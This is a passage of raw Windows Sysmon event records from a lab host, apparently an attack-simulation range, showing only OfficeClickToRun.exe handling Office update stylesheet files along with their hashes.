Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME51.CSSMD5=043B10E4958E08DDC6CFB2877819FA2B,SHA256=617EE79C4533A7E9A7EC0F35F2AED6E1EC11502E18B1D5FC6C80F3282296FEFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068161Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME50.CSSMD5=6585C4B4B2772A5D93CC1E89DA6828EA,SHA256=8C25C35B683A5DC055EC35514A578966526C1893A6122D23D90A90A8EB9F645D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068160Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME49.CSSMD5=6B97DEBD3AFD70B6AC2AFBBA2404EFD6,SHA256=DB05470908BFFE869B399AFE1348F968BC3959364EA46703566828327113875E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068159Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME48.CSSMD5=467A311773D0DA96E3F583DF6407240A,SHA256=E164C6C189673346FB3647641C023D5CD76017EDE09DEB80F42063DEBF0AE428,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068158Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME47.CSSMD5=98C11CECF55DD840892C60A9D73CE26F,SHA256=C15F6AD41D54EEAA4DB624678BE12ADFCCE1BC5C951BE0968533C306FB00B2FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068157Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME46.CSSMD5=81AF8A22F14396B7BE44496D8FC4B7A2,SHA256=FD83E52575634CEEA0517ACAECEC0ADD33AA19376FF7B531F4D3ECAC449B384E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068156Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME45.CSSMD5=9B7CECDF635B3547ECF77275FC5EC0E0,SHA256=0AE394605BA6C75B0EEBEF77CBD2F40A682232023E4601E32687B6E7CCA4C8D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068155Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME44.CSSMD5=71FB0EB57512264FB321208F63DE2052,SHA256=93A9A9581DA34438BCB13FD5A163F800F71061C1206945F9049BB4A64148817F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068154Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME43.CSSMD5=EBC22AF9A7C6B3068E19C5DC10AC57FC,SHA256=DCE989415CBF99B40A480A97665927E2D90EBAFFC926C9D54B724EA9FB64368D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068153Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME42.CSSMD5=DEE76E8CE0DBB86E6A38B3D442FE4D1F,SHA256=B76000CBD304E69B79DCFEA707CACCB876543066BE340EAE709FD18C5C1BC780,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068152Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME41.CSSMD5=C8874A3DD4791510DD66B69561AB58A0,SHA256=E282ED68BE473C80315935FCF7B0A84CDA257D204CE75DA19D1D53BBEEFA240A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068151Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME40.CSSMD5=45709F0829AFAA9B04C858EFEBF9DE7A,SHA256=DC7C626A146AB5783AEBA640B99A52095D9A336689360F7EC29917DAF803CA80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068150Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME39.CSSMD5=1736D144FDC0C953103C1C5A85A484F1,SHA256=9C74CB78E2F691CE2ACFFFB51E74C95AEF8A0E810BC37067BD5F21DA7E009CC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068149Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME38.CSSMD5=CB5CB2310B89C068B82BD54C36265C07,SHA256=14E725854CC7E446F40CD1D4423AD062B4E615488E0E20DE4C294B882A5EDD65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068148Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME37.CSSMD5=653A88DCCE41BBE84667B8F387FFD130,SHA256=FA04459D439276E0224E519B1365A1933907AA47C0A9C8508B30861A438BC388,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068147Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME36.CSSMD5=39EE91C121788850ECBEABC84F1E553C,SHA256=1FAA84DE31133EFBE453E686FB2D6981BC005CBA5B14F1D5D5E26D118768B2FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068146Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME35.CSSMD5=45935390B44D4FABB3CD6C01625AFC84,SHA256=B1717FC39504686CAAC01089F135A0F4C4803807755EC91E911B8D9878AC28D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068145Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME34.CSSMD5=DFE7F22FE8EF16384F129FFF45E8CB92,SHA256=94E4EAFE9DA3599CE4C6AAFEFA38F015E69F6BE174D783C5BC63746C4A6DAAE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068144Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME33.CSSMD5=687DA56449A9CEE3A7A9292AD0D6ECA3,SHA256=64161D24AD31C30DA34B9ED4C528C0AA7962A2BA04C08E4ADFE5BD8BF82D5508,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068143Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME32.CSSMD5=A7F0A5CC20652B15FF89F41BD3613B76,SHA256=EEBBC3A5E45DB8707DC0ACC4181A0DC5FC3ACE8EBF847AF676BAEE849FDB6404,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068142Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME31.CSSMD5=D2513812782DF6928F2113155C2656E2,SHA256=033B0D10A2F7C30336252A9F465F7B3A93154322DABBF62542CB0D1728A01CDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068141Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME30.CSSMD5=8EFB9CFC8A96ADE8EF7E833A6D315817,SHA256=CE1159C274ED5E2B64FCA54DCE151A0161F0D2D62FD3E4B5BD1F493ADAB37175,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068140Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME29.CSSMD5=2EB302885B8DA428D9EC6A775D5E70CA,SHA256=0FC903A38613D79CE00FD652C70277E4E13927D3B179610BF5DC0DE5954E0F69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068139Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME28.CSSMD5=D97122BCA949234300616E9C6ECCE184,SHA256=7374C5F2D72BD1C7B624F7231124E6699D14348ECF771345797203E37B39A90A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068138Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME27.CSSMD5=E0039D78027435EEB7E77C500375C0C3,SHA256=1208F7BBFBD3F9CB2B023C2755F2B2340A1757FF44217F25664FA02CAA29CB2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068137Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME26.CSSMD5=F444E1C79489DF340AC963BFC8975F85,SHA256=9DBCF889DA4E5DCE2B1932F6D77DA92316799692BF706343045AB120D29BD7B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068136Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME25.CSSMD5=B2945477E07DAB3AEAB8BBB62D8C50C3,SHA256=FF5EDF6D95F8720B09169D3E85F8BF778F6D66716F3818ABD2F7DBFFDE986919,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068135Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME24.CSSMD5=2978FEC90562BE1BFB61C0FF4E46E85E,SHA256=10EB94AC9A38C461B573E4239E9DF8823DEAB32DE96C03AB08AB22F5DBA6F7D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068134Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME23.CSSMD5=553445451434865CDB76C0EDC7E58C0E,SHA256=824CDDE78FB33CA66264C01AC0127E8DE2A21BC9E76427AB34C283764AC052BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068133Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME22.CSSMD5=FBE1D29A17B70D12CA2936177DAF7FBE,SHA256=FD58335BE14C63EB96346334BEC56686D3D90AED531B6455F4442A53B7D0198B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068132Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME21.CSSMD5=37277D07E36547AB0B61306631FC0B16,SHA256=0C5CF8CDA156E78992981147E693D40235DB325BC1D785319B613DBE6B7AAFDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068131Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME20.CSSMD5=6D507BB72278B5550D6C2096035A6785,SHA256=2399EDB11C8C290F272D77F93BC79DE911C5828C933B89590FDAC39DF3FD2E35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068130Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME19.CSSMD5=DC3C892C7CCEF86F8F746CF4ED061CA3,SHA256=F265D48131E36A8BC6D6B42CF4FB3551212FAB63D0C54929752BB0B1D23599A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068129Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME18.CSSMD5=6744451DF1FD4F93361BFD9852048065,SHA256=3D4300B003247F9A8EB01BCE00822CB8ACD2CF2440EA974A234461DD71248A51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068128Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME17.CSSMD5=BF04DC289FFC872AA61FE64AFFA41810,SHA256=B42EEF24EE9D2307AA478D71515A9E8EA5F580DBD521F90A4D3AA00F455623C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068127Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME16.CSSMD5=4B6374360F4ADA2366824FBD63DBFD6B,SHA256=7CA54EEDEBA7FE937C48360969DE4605D7C60FE9A84B568F9FF317D7385A4D4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068126Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME15.CSSMD5=3CCE7EF8B5475CB36BCB639D1608B530,SHA256=F6A394F622C19F652F212373F0044B9DA0A930B3B3BA94123306243AD646FAD0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068125Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME14.CSSMD5=C11C1EC9D78784A0A2A9615F0F3D822E,SHA256=449FAC9E75D21F76AE8EBCA041ACAC26EE1DB548AAD4E44CB854B9DF251617A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068124Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME13.CSSMD5=8E929DEBFF3387642F4F7F7672FF9E44,SHA256=560E1C57441C98584FE35F33CA0B980429928D0439E89A29647E291CF7B0CA78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068123Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME12.CSSMD5=769B0234FD6ED4481086B062186FF300,SHA256=FE86A92168E408BF0CF7E7DAD59E09A620101F0193FE6CE5818355D4C09AB929,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068122Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME11.CSSMD5=C1392A1ED9291D09C93A4692633742A9,SHA256=BEC953541F9DA8EDB1EF91C5FC78A0BC6C48D611A67653F79FBFC46251377D9A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068121Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME10.CSSMD5=1421A07950AF45AF29723E77E88A82FE,SHA256=80BF69C351775C6404725B6540B6258A5B61F30B441AA0A574942FCE760AFA22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068120Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME09.CSSMD5=D139F535C281138E4CFA8EBDE98F8F8C,SHA256=14410D7E5EEB18BAADD117F88006852E8AF9B0F872AD68169242509EAE0D6A49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068119Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME08.CSSMD5=01089B285405681ECE372542A86F4F1D,SHA256=4810C94B2C7BA57D792785B53414C80CE7C57B99519E53F675865B7E1A9B31A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068118Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 